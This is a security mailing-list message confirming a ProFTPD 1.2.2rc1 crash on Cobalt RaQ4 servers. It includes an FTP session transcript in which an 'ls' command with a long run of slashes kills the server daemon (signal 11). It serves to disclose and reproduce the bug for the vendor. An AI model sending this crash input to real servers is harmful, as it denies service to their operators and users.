Hello Mark,
I have attempted to duplicate this bug, but have not been successful
using the versions of Proftpd that are available from Sun/Cobalt's
support site. Are you running a different version of ProFTPd than the
ones published on the site? If so, please elaborate on the details so
we can attempt to duplicate and validate the issue.
Nope. I'm running a bod standard Cobalt RaQ4 with all the packages from the
Support site installed and the Cobalt supplied version of ProFTPD running
without any modifications. It is vulnerable to this bug.
I've just confirmed this on 2 other RaQ4's that we have. Here's the info:
ftp 0
Connected to 0.
220 ProFTPD 1.2.2rc1 Server (ProFTPD) [xxx.xxxxxxxx.xxx]
Name (0:admin): XXXXX
331 Password required for XXXXX.
Password:
230 User XXXXX logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls ///////////////
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
421 Service not available, remote server has closed connection
ftp> quit
tail /var/log/messages
Dec 20 09:11:47 xxx proftpd[4676]: xxx.xxxxxxxx.xxx (localhost[127.0.0.1]) -
ProFTPD terminating (signal 11)
Regards,
Jonathan Michaelson
_________________
______________________________
cobalt-security mailing list
cobalt-security@xxxxxxxxxxxxxxx
http://list.cobalt.com/mailman/listinfo/cobalt-security